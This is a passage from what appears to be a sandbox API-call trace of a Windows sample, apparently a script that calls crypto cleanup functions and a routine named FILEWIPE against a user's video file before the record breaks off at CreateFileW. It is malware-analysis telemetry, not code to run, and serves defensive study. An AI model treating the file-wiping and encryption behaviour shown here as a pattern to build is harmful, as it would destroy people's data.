(in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.982] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.985] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.985] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.985] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.985] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.985] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.985] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.985] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.986] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.986] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.986] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.986] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.986] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.994] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.994] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.994] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.999] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.000] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.000] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.000] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.000] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0043.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.000] CryptDestroyKey (hKey=0x7c2280) returned 1 [0043.000] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.000] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.000] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.001] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.001] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.001] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.001] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.001] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0043.001] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.001] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.001] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.001] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.001] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.001] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0043.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.001] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.002] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.002] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.002] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.002] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.002] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.002] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.002] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.002] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.002] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0043.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.002] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.002] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0043.002] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.003] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.003] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0043.003] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.003] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.004] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.004] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0043.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c70ab0, ftCreationTime.dwHighDateTime=0x1d5c0af, ftLastAccessTime.dwLowDateTime=0x72ef5940, ftLastAccessTime.dwHighDateTime=0x1d5c503, ftLastWriteTime.dwLowDateTime=0x72ef5940, ftLastWriteTime.dwHighDateTime=0x1d5c503, nFileSizeHigh=0x0, nFileSizeLow=0x182dc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ejDsspxAB.mkv", cAlternateFileName="EJDSSP~1.MKV")) returned 0x7c2240 [0043.005] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0043.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.005] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.005] CharLowerBuffW (in: lpsz="byte[99036]", cchLength=0xb | out: lpsz="byte[99036]") returned 0xb [0043.006] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.006] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.006] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.006] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.006] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.006] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.007] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.007] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.007] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.008] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.008] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.009] CreateFileW 